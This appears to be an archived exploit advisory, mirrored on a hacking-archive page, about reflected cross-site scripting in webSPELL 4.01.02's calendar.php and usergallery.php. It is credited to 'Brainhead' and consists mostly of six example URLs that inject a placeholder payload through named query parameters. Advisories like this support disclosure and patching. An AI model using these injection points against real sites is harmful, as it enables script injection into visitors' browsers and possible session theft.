AOH :: HP Unsorted W :: BX1001.HTM

webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability



webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability



###################
Autor: Brainhead
Type: XSS
Version:  4.01.02
Files: usergallery.php, calendar.php
Magic Quotes :off
###################
Examples:

[your">http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code]
[your">http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=">[your code]
[your">http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=">[your code]
[your">http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=">[your code]
[your">http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=">[your code]
[your">http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=">[your code] 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.